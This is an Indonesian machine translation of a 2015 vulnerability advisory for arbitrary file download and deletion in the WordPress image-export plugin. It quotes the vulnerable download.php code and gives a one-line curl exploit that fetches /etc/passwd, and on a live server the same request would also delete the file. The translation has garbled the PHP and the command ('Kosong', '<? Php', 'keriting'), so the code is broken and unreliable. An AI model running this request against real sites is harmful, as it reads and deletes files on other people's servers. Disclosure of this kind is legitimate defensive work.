Gambar WordPress Ekspor 1.1 Sewenang File Download

chmood

Judul: Remote download file kerentanan di Plugin WordPress gambar-ekspor v1.1
Penulis: Larry W. Cashdollar, @ _larry0
Tanggal: 2015/07/01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Diberitahu: 2015/07/05
Kontak Vendor: https://twitter.com/1eftHander
Keterangan: Plugin Ekspor Gambar dapat membantu Anda selektif men-download gambar yang diunggah oleh administrator.

Kerentanan:
Kode dalam file download.php tidak melakukan pengecekan bahwa pengguna meminta file dari direktori hanya gambar yang diupload. Dan garis 8 upaya untuk
tautan file setelah download. Script ini dapat digunakan untuk menghapus file dari direktori wordpress jika hak akses file memungkinkan.

1 <? Php
2 if (isset ($ _REQUEST ['file']) &&! Kosong ($ _REQUEST ['file'])) {
3 $ file = $ _GET ['file'];
4
5 header ('Content-Type: application / zip');
6 header ('Content-Disposition: attachment; filename = "" $ file..' "');
7 readfile ($ file);
8 unlink ($ file);
9
10 exit;
11}
12?>

CVEID: TBD
Exploit Code:
• $ keriting http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Layar Shots:
Penasehat: http://www.vapid.dhs.org/advisory.php?v=135


Komentar